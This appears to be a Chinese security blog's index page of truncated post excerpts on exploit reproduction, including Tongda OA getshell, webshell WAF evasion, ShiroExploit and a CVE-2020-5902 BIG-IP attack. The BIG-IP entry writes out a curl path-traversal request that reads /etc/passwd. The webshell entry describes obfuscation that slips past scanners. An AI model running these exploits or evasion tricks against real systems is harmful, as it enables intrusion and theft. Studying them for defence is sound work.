通达OA 后台getshell 新思路

之前碰到一个是后台sql 没办法写入文件。然后对于普通用户的情况下。如何getshell  这里通过三个小漏洞的结合导致的一个getshell 这里使用的是通达OA 11.7  最新版。下载地址如...

Flask debug模式下的 PIN 码安全性

原文地址:https://xz.aliyun.com/t/8092 环境: Centos8  python3.6 FlasK 1.1.2 首先确认一下Flask 版本 #python Python 3.6.8 (default, Nov 21 201...

Nginx 记录POST记录并设置日志只允许追加

之前想融入到默认配置中。但是还是有一些会出现疑问。只能以文章的形式来配置 之前想过异步的存储日志的方式。但是udp 的方式也是挺消耗性能的无果 一、Nginx 的默认日志文件如下: ...

无eval 木马免杀人免杀D盾

编码器进行的加密,首先对传输的数据进行2层base64加密,由于一般waf可以对base64进行解密,然后在做检测,为了更好的绕过waf,这里对base64中的x字符进行替换变成***,这样在waf遇到这些数据的时候,就会识别不出来,...

ShiroExploit 工具回显

来自https://github.com/feihong-cs/ShiroExploit github 下载太慢了。我就自己传了一份 https://www.o2oxy.cn/wp-content/uploads/2020/07/ShiroExploit.V2.3.zip

CVE-2020-5902 BIG-IP RCE漏洞复现

curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd' POST /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1 Host: xxxxxx Conn...

记一次目录遍历到后台

ip:xx.xxx.xxx  扫描一下IP  就开了两个端口。一个3389  一个80 打开主页 然后访问钓鱼的页面  /index.php/Home/Index/index/ptm/18/ptb...

Spring Boot Actuator H2 RCE复现

原文:https://www.cnblogs.com/cwkiller/p/12829974.html 参考:https://github.com/LandGrey/SpringBootVulExploit/blob/master/README.md 前端时间碰到一个Actuator  信息...

CVE-2020-11651 SaltStack漏洞复现

使用Docker 来启动一个环境 docker pull vulfocus/saltstack-cve_2020_11651 docker run -d -p 4506:4506 -p 4505:4505 vulfocus/saltstack-cve_2020_11651 然后当前的...

pipePotato 复现

原文  首发揭示!pipe土豆:一种新型的通用提权细分 传递了一个asp 的木马 执行权限为iis 运行e...